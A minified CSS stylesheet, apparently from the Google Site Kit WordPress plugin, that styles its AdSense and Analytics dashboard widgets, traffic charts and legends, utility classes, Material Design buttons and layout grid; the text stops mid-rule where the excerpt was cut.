.googlesitekit-adsense-performance-overview{display:flex;flex-wrap:wrap;justify-content:space-evenly;padding:16px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-adsense-performance-overview{padding:24px}}.googlesitekit-plugin .googlesitekit-adsense-performance-overview .googlesitekit-data-block--button{min-width:25%;padding-left:20px;padding-right:20px}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__totalcount .googlesitekit-data-block__title{display:block;text-transform:capitalize}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__totalcount svg{vertical-align:bottom}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__totalcount .googlesitekit-cta-link{font-size:16px;letter-spacing:.5px}.googlesitekit-plugin .googlesitekit-widget__analytics--all-traffic .mdc-tab__text-label,.googlesitekit-plugin .googlesitekit-widget.googlesitekit-widget--legacy-all-traffic-widget .mdc-tab__text-label{color:#6c726e}.googlesitekit-plugin .googlesitekit-widget__analytics--all-traffic .mdc-tab-scroller__scroll-content,.googlesitekit-plugin .googlesitekit-widget.googlesitekit-widget--legacy-all-traffic-widget .mdc-tab-scroller__scroll-content{justify-content:center}.googlesitekit-plugin .googlesitekit-widget__analytics--all-traffic .mdc-tab-indicator__content--underline,.googlesitekit-plugin .googlesitekit-widget.googlesitekit-widget--legacy-all-traffic-widget .mdc-tab-indicator__content--underline{border-radius:4px 4px 0 0;height:4px}.googlesitekit-plugin .googlesitekit-widget__analytics--all-traffic .mdc-tab__text-label,.googlesitekit-plugin .googlesitekit-widget.googlesitekit-widget--legacy-all-traffic-widget .mdc-tab__text-label{letter-spacing:normal;opacity:1;text-transform:none}.googlesitekit-plugin .googlesitekit-widget__analytics--all-traffic .mdc-tab,.googlesitekit-plugin .googlesitekit-widget.googlesitekit-widget--legacy-all-traffic-widget .mdc-tab{height:40px;margin:0 10px;padding:0 20px}.googlesitekit-plugin .googlesitekit-widget__analytics--all-traffic .mdc-tab.mdc-tab--active .mdc-tab__text-label,.googlesitekit-plugin .googlesitekit-widget.googlesitekit-widget--legacy-all-traffic-widget .mdc-tab.mdc-tab--active .mdc-tab__text-label{color:#3c7251}@media(min-width: 600px)and (max-width: 1280px){.googlesitekit-plugin .googlesitekit-widget__analytics--all-traffic .mdc-tab,.googlesitekit-plugin .googlesitekit-widget.googlesitekit-widget--legacy-all-traffic-widget .mdc-tab{margin:0;padding:0 10px}}.googlesitekit-plugin .googlesitekit-widget__analytics--all-traffic .mdc-tab--active[disabled] .mdc-tab-indicator__content--underline,.googlesitekit-plugin .googlesitekit-widget.googlesitekit-widget--legacy-all-traffic-widget .mdc-tab--active[disabled] .mdc-tab-indicator__content--underline{background-color:#999f9b;opacity:.6}.googlesitekit-plugin .googlesitekit-widget__analytics--all-traffic .googlesitekit-widget__footer,.googlesitekit-plugin .googlesitekit-widget.googlesitekit-widget--legacy-all-traffic-widget .googlesitekit-widget__footer{padding-top:0}.googlesitekit-plugin .googlesitekit-widget__analytics--all-traffic .googlesitekit-data-block__title,.googlesitekit-plugin .googlesitekit-widget.googlesitekit-widget--legacy-all-traffic-widget .googlesitekit-data-block__title{font-size:14px;letter-spacing:.25px;line-height:1.43}.googlesitekit-plugin .googlesitekit-widget__analytics--all-traffic .googlesitekit-data-block__datapoint,.googlesitekit-plugin .googlesitekit-widget.googlesitekit-widget--legacy-all-traffic-widget .googlesitekit-data-block__datapoint{font-size:58px;line-height:1.1}.googlesitekit-plugin .googlesitekit-widget__analytics--all-traffic .googlesitekit-data-block__arrow,.googlesitekit-plugin .googlesitekit-widget.googlesitekit-widget--legacy-all-traffic-widget .googlesitekit-data-block__arrow{vertical-align:top}.googlesitekit-plugin .googlesitekit-widget__analytics--all-traffic .googlesitekit-data-block__suffix,.googlesitekit-plugin .googlesitekit-widget.googlesitekit-widget--legacy-all-traffic-widget .googlesitekit-data-block__suffix{font-weight:400}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__user-count-chart{position:relative;top:16px}}@media(min-width: 1280px){.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__user-count-chart{top:0}}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__dimensions{min-height:450px;padding-top:30px;position:relative}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__dimensions .googlesitekit-preview-block.googlesitekit-widget--analyticsAllTraffic__dimensions--not-loading{display:none}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__dimensions .googlesitekit-preview-block.googlesitekit-widget--analyticsAllTraffic__dimensions--loading{left:50%;position:absolute;top:50%;transform:translate(-50%, -50%)}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__dimensions .googlesitekit-widget--analyticsAllTraffic__dimensions-container{position:relative}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__totalcount--loading{margin:0 0 10px}@media(min-width: 1280px){.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__totalcount--loading{min-height:106px}}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__dimensions-chart{height:100%;position:relative;width:100%}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__dimensions-chart .googlesitekit-chart-loading{padding-bottom:32px;padding-top:32px}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__empty-dimensions-chart{padding:16px;text-align:center}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__empty-dimensions-chart{padding:24px}}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__empty-dimensions-chart .mdc-layout-grid__inner{align-items:center;min-height:120px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__empty-dimensions-chart .mdc-layout-grid__inner{min-height:270px}}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__empty-dimensions-chart svg{max-width:140px}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__empty-dimensions-chart h4{color:#6c726e;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:16px;font-weight:400;letter-spacing:.5px;line-height:1.5;margin:0}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__empty-dimensions-chart p{color:#6c726e;font-size:12px;letter-spacing:.2px;line-height:1.33;margin:4px 0 0}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__selectable .googlesitekit-chart__inner>div>div>div>svg>g>path,.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__selectable .googlesitekit-chart__inner>div>div>div>svg>g>g{cursor:pointer}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__slice-selected .googlesitekit-chart--PieChart div.google-visualization-tooltip{pointer-events:auto;z-index:8}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__dimensions-chart-title{color:#6c726e;font-size:12px;font-weight:500;left:50%;letter-spacing:.2px;max-width:80px;position:absolute;text-align:center;text-transform:capitalize;top:50%;transform:translate(-50%, -50%)}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__dimensions-chart-title span{display:block;font-weight:400}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__dimensions-chart-gathering-data{color:#cbd0d3;font-size:18px;left:50%;line-height:1.33;max-width:80px;position:absolute;text-align:center;top:50%;transform:translate(-50%, -50%)}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__tabs--small{text-align:center}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__tabs--small{display:none}}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__tabs--loading{display:flex;flex-direction:row;justify-content:center}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__tabs--loading .googlesitekit-preview-block{margin:0 10px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__totals{margin-bottom:-24px}}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__totals .googlesitekit-cta--error{height:auto;margin-top:16px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__totals .googlesitekit-cta--error{margin-top:24px}}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__chart{min-height:368px;position:relative}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__legend{margin-top:-6px;text-align:center}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__legend .googlesitekit-cta-link__contents{align-items:center;display:inline-flex}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__legend-slice{align-items:center;border-radius:4px;color:#333935;display:inline-flex;font-size:12px;font-weight:400;letter-spacing:.2px;margin:0 4px 0 0;padding:7px 4px;position:relative;text-transform:capitalize}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__legend-slice:hover{-webkit-text-decoration:none;text-decoration:none}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__legend-slice:focus{outline:none}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__label{display:inline-flex;flex-direction:column}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__label::after{content:attr(data-label);display:inline-flex;font-weight:500;height:0;visibility:hidden}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__dot{border-radius:50%;display:inline-block;height:12px;margin:0 4px 0 0;width:12px}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__underlay{display:block;height:100%;left:0;opacity:0;position:absolute;top:0;transition:opacity .2s ease-in-out;width:100%;z-index:1}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__legend-active{font-weight:500}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__legend-active .googlesitekit-widget--analyticsAllTraffic__underlay,.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__legend-slice:hover .googlesitekit-widget--analyticsAllTraffic__underlay{opacity:.16}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__legend-others{cursor:text}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__legend-others:hover .googlesitekit-widget--analyticsAllTraffic__underlay{opacity:0}.googlesitekit-plugin .googlesitekit-widget--analyticsAllTraffic__legend--single .googlesitekit-widget--analyticsAllTraffic__legend-slice:not(:first-child){display:none}.googlesitekit-plugin .googlesitekit-widget--adBlockerWarning{background-color:transparent;box-shadow:none}.googlesitekit-plugin .googlesitekit-analytics-popular-pages-widget__report-table--tabbed-layout .googlesitekit-table__body-item:last-child{white-space:nowrap}.googlesitekit-plugin .googlesitekit-analytics-popular-pages-widget__report-table--tabbed-layout .googlesitekit-table__body-item:last-child .googlesitekit-table__body-item-content{padding-left:1em}.googlesitekit-plugin .googlesitekit-widget-error-handler{display:grid;grid-column:1/-1;grid-row:1/-1;grid-template-columns:subgrid}.googlesitekit-plugin .googlesitekit-align-self-center{align-self:center}.googlesitekit-plugin .googlesitekit-border-radius-round{border-radius:50%}@media(min-width: 600px)and (max-width: 783px){.googlesitekit-plugin .googlesitekit-border-radius-round--tablet{border-radius:50%}}@media(max-width: 599px){.googlesitekit-plugin .googlesitekit-border-radius-round--phone{border-radius:50%}}.googlesitekit-plugin .googlesitekit-color--surfaces-on-background-variant{color:#6c726e}.googlesitekit-plugin .googlesitekit-display-block{display:block}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-desktop-display-none{display:none}}@media(max-width: 960px){.googlesitekit-plugin .googlesitekit-non-desktop-display-none{display:none}}.googlesitekit-plugin .googlesitekit-font-weight-medium{font-weight:500}.googlesitekit-plugin .googlesitekit-font-weight-bold{font-weight:700 !important}.googlesitekit-plugin .googlesitekit-margin-top-0{margin-top:0 !important}.googlesitekit-plugin .googlesitekit-margin-top-1{margin-top:1rem !important}.googlesitekit-plugin .googlesitekit-margin-bottom-0{margin-bottom:0 !important}.googlesitekit-plugin .googlesitekit-margin-bottom-1rem{margin-bottom:1rem !important}.googlesitekit-plugin .googlesitekit-margin-left-1rem{margin-left:1rem}.googlesitekit-plugin .googlesitekit-margin-left-auto{margin-left:auto}.googlesitekit-plugin .googlesitekit-margin-right-0{margin-right:0}.googlesitekit-plugin .googlesitekit-overflow-auto{overflow:auto}.googlesitekit-plugin .googlesitekit-overflow-hidden{overflow:hidden}.googlesitekit-plugin .googlesitekit-overflow-wrap-break-word{overflow-wrap:break-word}.googlesitekit-plugin .googlesitekit-padding-top-0{padding-top:0}.googlesitekit-plugin .googlesitekit-padding-bottom-0{padding-bottom:0}.googlesitekit-plugin .googlesitekit-text-align-center{text-align:center}.googlesitekit-plugin .googlesitekit-width-auto{width:auto} :root{--reach-combobox: 1}.googlesitekit-plugin{color:#161b18;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;line-height:1.43}.googlesitekit-plugin *,.googlesitekit-plugin *::before,.googlesitekit-plugin *::after{box-sizing:border-box}.googlesitekit-plugin svg{color:inherit}.googlesitekit-plugin svg:not(:root){overflow:hidden}.googlesitekit-plugin h1,.googlesitekit-plugin h2,.googlesitekit-plugin h3,.googlesitekit-plugin h4,.googlesitekit-plugin h5,.googlesitekit-plugin h6{color:#161b18}.googlesitekit-plugin .googlesitekit-subheading-1{font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;font-weight:700;line-height:1.14}.googlesitekit-plugin .googlesitekit-subheading-2{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:12px;font-weight:500;letter-spacing:.2px;line-height:1.33}.googlesitekit-plugin .googlesitekit-nodata{display:none}.googlesitekit-plugin legend,.googlesitekit-plugin p:not([class*=mdc-]){font-size:14px;letter-spacing:.25px}.googlesitekit-plugin a{color:#108080;-webkit-text-decoration:none;text-decoration:none}.googlesitekit-plugin a:hover{color:#108080;-webkit-text-decoration:underline;text-decoration:underline}.googlesitekit-plugin a:focus{box-shadow:none;outline:1px dotted #000;outline-offset:3px}.googlesitekit-plugin button{background:none;border:none;border-radius:100px;color:#108080;-webkit-text-decoration:none;text-decoration:none}.googlesitekit-plugin button:hover{-webkit-text-decoration:underline;text-decoration:underline}.googlesitekit-plugin button:focus{outline:1px dotted #000;outline-offset:6px}.googlesitekit-plugin legend{line-height:1.5;margin:1em 0}.googlesitekit-plugin .screen-reader-only{clip:rect(1px, 1px, 1px, 1px);height:1px;overflow:hidden;position:absolute !important;width:1px}@media(max-width: 599px){.googlesitekit-plugin .hidden-on-mobile{display:none}}.googlesitekit-hidden{display:none !important}.mdc-button,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;font-size:.875rem;line-height:2.25rem;font-weight:500;letter-spacing:.0892857143em;-webkit-text-decoration:none;text-decoration:none;text-transform:uppercase;padding:0 8px 0 8px;display:inline-flex;position:relative;align-items:center;justify-content:center;box-sizing:border-box;min-width:64px;height:36px;border:none;outline:none;line-height:inherit;-webkit-user-select:none;user-select:none;-webkit-appearance:none;overflow:hidden;vertical-align:middle;border-radius:4px}.mdc-button::-moz-focus-inner,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button::-moz-focus-inner{padding:0;border:0}.mdc-button:active,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button:active{outline:none}.mdc-button:hover,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button:hover{cursor:pointer}.mdc-button:disabled,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button:disabled{background-color:transparent;color:rgba(0,0,0,.37);cursor:default;pointer-events:none}.mdc-button.mdc-button--dense,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--dense.mdc-button{border-radius:4px}.mdc-button:not(:disabled),#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button:not(:disabled){background-color:transparent}.mdc-button .mdc-button__icon,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button .mdc-button__icon{margin-left:0;margin-right:8px;display:inline-block;width:18px;height:18px;font-size:18px;vertical-align:top}[dir=rtl] .mdc-button .mdc-button__icon,[dir=rtl] #wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button .mdc-button__icon,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar [dir=rtl] .mdc-button .mdc-button__icon,.mdc-button .mdc-button__icon[dir=rtl],#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button .mdc-button__icon[dir=rtl]{margin-left:8px;margin-right:0}.mdc-button:not(:disabled),#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button:not(:disabled){color:#3c7251;color:var(--mdc-theme-primary, #3c7251)}.mdc-button__label+.mdc-button__icon{margin-left:8px;margin-right:0}[dir=rtl] .mdc-button__label+.mdc-button__icon,.mdc-button__label+.mdc-button__icon[dir=rtl]{margin-left:0;margin-right:8px}svg.mdc-button__icon{fill:currentColor}.mdc-button--raised .mdc-button__icon,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised .mdc-button__icon,.mdc-button--unelevated .mdc-button__icon,.mdc-button--outlined .mdc-button__icon{margin-left:-4px;margin-right:8px}[dir=rtl] .mdc-button--raised .mdc-button__icon,[dir=rtl] #wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised .mdc-button__icon,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar [dir=rtl] .mdc-button--raised .mdc-button__icon,.mdc-button--raised .mdc-button__icon[dir=rtl],#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised .mdc-button__icon[dir=rtl],[dir=rtl] .mdc-button--unelevated .mdc-button__icon,.mdc-button--unelevated .mdc-button__icon[dir=rtl],[dir=rtl] .mdc-button--outlined .mdc-button__icon,.mdc-button--outlined .mdc-button__icon[dir=rtl]{margin-left:8px;margin-right:-4px}.mdc-button--raised .mdc-button__label+.mdc-button__icon,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised .mdc-button__label+.mdc-button__icon,.mdc-button--unelevated .mdc-button__label+.mdc-button__icon,.mdc-button--outlined .mdc-button__label+.mdc-button__icon{margin-left:8px;margin-right:-4px}[dir=rtl] .mdc-button--raised .mdc-button__label+.mdc-button__icon,[dir=rtl] #wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised .mdc-button__label+.mdc-button__icon,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar [dir=rtl] .mdc-button--raised .mdc-button__label+.mdc-button__icon,.mdc-button--raised .mdc-button__label+.mdc-button__icon[dir=rtl],#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised .mdc-button__label+.mdc-button__icon[dir=rtl],[dir=rtl] .mdc-button--unelevated .mdc-button__label+.mdc-button__icon,.mdc-button--unelevated .mdc-button__label+.mdc-button__icon[dir=rtl],[dir=rtl] .mdc-button--outlined .mdc-button__label+.mdc-button__icon,.mdc-button--outlined .mdc-button__label+.mdc-button__icon[dir=rtl]{margin-left:-4px;margin-right:8px}.mdc-button--raised,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised,.mdc-button--unelevated{padding:0 16px 0 16px}.mdc-button--raised:disabled,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised:disabled,.mdc-button--unelevated:disabled{background-color:rgba(0,0,0,.12);color:rgba(0,0,0,.37)}.mdc-button--raised:not(:disabled),#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised:not(:disabled),.mdc-button--unelevated:not(:disabled){background-color:#3c7251}@supports not (-ms-ime-align: auto){.mdc-button--raised:not(:disabled),#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised:not(:disabled),.mdc-button--unelevated:not(:disabled){background-color:var(--mdc-theme-primary, #3c7251)}}.mdc-button--raised:not(:disabled),#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised:not(:disabled),.mdc-button--unelevated:not(:disabled){color:#fff;color:var(--mdc-theme-on-primary, #fff)}.mdc-button--raised,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised{box-shadow:0px 3px 1px -2px rgba(0, 0, 0, 0.2),0px 2px 2px 0px rgba(0, 0, 0, 0.14),0px 1px 5px 0px rgba(0,0,0,.12);transition:box-shadow 280ms cubic-bezier(0.4, 0, 0.2, 1)}.mdc-button--raised:hover,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised:hover,.mdc-button--raised:focus,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised:focus{box-shadow:0px 2px 4px -1px rgba(0, 0, 0, 0.2),0px 4px 5px 0px rgba(0, 0, 0, 0.14),0px 1px 10px 0px rgba(0,0,0,.12)}.mdc-button--raised:active,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised:active{box-shadow:0px 5px 5px -3px rgba(0, 0, 0, 0.2),0px 8px 10px 1px rgba(0, 0, 0, 0.14),0px 3px 14px 2px rgba(0,0,0,.12)}.mdc-button--raised:disabled,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised:disabled{box-shadow:0px 0px 0px 0px rgba(0, 0, 0, 0.2),0px 0px 0px 0px rgba(0, 0, 0, 0.14),0px 0px 0px 0px rgba(0,0,0,.12)}.mdc-button--outlined{border-style:solid;padding:0 15px 0 15px;border-width:1px}.mdc-button--outlined:disabled{border-color:rgba(0,0,0,.37)}.mdc-button--outlined:not(:disabled){border-color:#3c7251;border-color:var(--mdc-theme-primary, #3c7251)}.mdc-button--dense{height:32px;font-size:.8125rem}@keyframes mdc-ripple-fg-radius-in{from{animation-timing-function:cubic-bezier(0.4, 0, 0.2, 1);transform:translate(var(--mdc-ripple-fg-translate-start, 0)) scale(1)}to{transform:translate(var(--mdc-ripple-fg-translate-end, 0)) scale(var(--mdc-ripple-fg-scale, 1))}}@keyframes mdc-ripple-fg-opacity-in{from{animation-timing-function:linear;opacity:0}to{opacity:var(--mdc-ripple-fg-opacity, 0)}}@keyframes mdc-ripple-fg-opacity-out{from{animation-timing-function:linear;opacity:var(--mdc-ripple-fg-opacity, 0)}to{opacity:0}}.mdc-ripple-surface--test-edge-var-bug{--mdc-ripple-surface-test-edge-var: 1px solid #000;visibility:hidden}.mdc-ripple-surface--test-edge-var-bug::before{border:var(--mdc-ripple-surface-test-edge-var)}.mdc-button,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button{--mdc-ripple-fg-size: 0;--mdc-ripple-left: 0;--mdc-ripple-top: 0;--mdc-ripple-fg-scale: 1;--mdc-ripple-fg-translate-end: 0;--mdc-ripple-fg-translate-start: 0;-webkit-tap-highlight-color:rgba(0,0,0,0)}.mdc-button::before,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button::before,.mdc-button::after,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button::after{position:absolute;border-radius:50%;opacity:0;pointer-events:none;content:""}.mdc-button::before,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button::before{transition:opacity 15ms linear,background-color 15ms linear;z-index:1}.mdc-button.mdc-ripple-upgraded::before,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-ripple-upgraded.mdc-button::before{transform:scale(var(--mdc-ripple-fg-scale, 1))}.mdc-button.mdc-ripple-upgraded::after,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-ripple-upgraded.mdc-button::after{top:0;left:0;transform:scale(0);transform-origin:center center}.mdc-button.mdc-ripple-upgraded--unbounded::after,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-ripple-upgraded--unbounded.mdc-button::after{top:var(--mdc-ripple-top, 0);left:var(--mdc-ripple-left, 0)}.mdc-button.mdc-ripple-upgraded--foreground-activation::after,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-ripple-upgraded--foreground-activation.mdc-button::after{animation:mdc-ripple-fg-radius-in 225ms forwards,mdc-ripple-fg-opacity-in 75ms forwards}.mdc-button.mdc-ripple-upgraded--foreground-deactivation::after,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-ripple-upgraded--foreground-deactivation.mdc-button::after{animation:mdc-ripple-fg-opacity-out 150ms;transform:translate(var(--mdc-ripple-fg-translate-end, 0)) scale(var(--mdc-ripple-fg-scale, 1))}.mdc-button::before,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button::before,.mdc-button::after,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button::after{top:calc(50% - 100%);left:calc(50% - 100%);width:200%;height:200%}.mdc-button.mdc-ripple-upgraded::after,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-ripple-upgraded.mdc-button::after{width:var(--mdc-ripple-fg-size, 100%);height:var(--mdc-ripple-fg-size, 100%)}.mdc-button::before,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button::before,.mdc-button::after,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button::after{background-color:#3c7251}@supports not (-ms-ime-align: auto){.mdc-button::before,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button::before,.mdc-button::after,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button::after{background-color:var(--mdc-theme-primary, #3c7251)}}.mdc-button:hover::before,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button:hover::before{opacity:.04}.mdc-button:not(.mdc-ripple-upgraded):focus::before,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button:not(.mdc-ripple-upgraded):focus::before,.mdc-button.mdc-ripple-upgraded--background-focused::before,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-ripple-upgraded--background-focused.mdc-button::before{transition-duration:75ms;opacity:.12}.mdc-button:not(.mdc-ripple-upgraded)::after,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.mdc-button:not(.mdc-ripple-upgraded):active::after,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.mdc-button.mdc-ripple-upgraded,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-ripple-upgraded.mdc-button{--mdc-ripple-fg-opacity: 0.12}.mdc-button--raised::before,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised::before,.mdc-button--raised::after,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised::after,.mdc-button--unelevated::before,.mdc-button--unelevated::after{background-color:#fff}@supports not (-ms-ime-align: auto){.mdc-button--raised::before,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised::before,.mdc-button--raised::after,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised::after,.mdc-button--unelevated::before,.mdc-button--unelevated::after{background-color:var(--mdc-theme-on-primary, #fff)}}.mdc-button--raised:hover::before,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised:hover::before,.mdc-button--unelevated:hover::before{opacity:.08}.mdc-button--raised:not(.mdc-ripple-upgraded):focus::before,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised:not(.mdc-ripple-upgraded):focus::before,.mdc-button--raised.mdc-ripple-upgraded--background-focused::before,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-ripple-upgraded--background-focused.mdc-button--raised::before,.mdc-button--unelevated:not(.mdc-ripple-upgraded):focus::before,.mdc-button--unelevated.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.24}.mdc-button--raised:not(.mdc-ripple-upgraded)::after,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised:not(.mdc-ripple-upgraded)::after,.mdc-button--unelevated:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.mdc-button--raised:not(.mdc-ripple-upgraded):active::after,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-button--raised:not(.mdc-ripple-upgraded):active::after,.mdc-button--unelevated:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.24}.mdc-button--raised.mdc-ripple-upgraded,#wpadminbar .googlesitekit-plugin .googlesitekit-adminbar .mdc-ripple-upgraded.mdc-button--raised,.mdc-button--unelevated.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.24}:root{--mdc-layout-grid-margin-desktop: 24px;--mdc-layout-grid-gutter-desktop: 24px;--mdc-layout-grid-column-width-desktop: 72px;--mdc-layout-grid-margin-tablet: 16px;--mdc-layout-grid-gutter-tablet: 16px;--mdc-layout-grid-column-width-tablet: 72px;--mdc-layout-grid-margin-phone: 16px;--mdc-layout-grid-gutter-phone: 16px;--mdc-layout-grid-column-width-phone: 72px}@media(min-width: 961px){.mdc-layout-grid,#wpadminbar.nojs .googlesitekit-noscript .mdc-layout-grid,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid{box-sizing:border-box;margin:0 auto;padding:24px;padding:var(--mdc-layout-grid-margin-desktop, 24px)}}@media(min-width: 601px)and (max-width: 960px){.mdc-layout-grid,#wpadminbar.nojs .googlesitekit-noscript .mdc-layout-grid,#wpadminbar .googlesitekit-adminbar .mdc-layout-grid{box-sizing:border-box;margin:0 auto;padding:16px;padding:var(--mdc-layout-grid-margin-tablet, 16px)}}@media(max-width: 600px){.mdc-layout-grid,#wpadminbar.nojs .googlesitekit-noscript .mdc-layout-grid,#wpadminbar .googlesitekit-adminbar 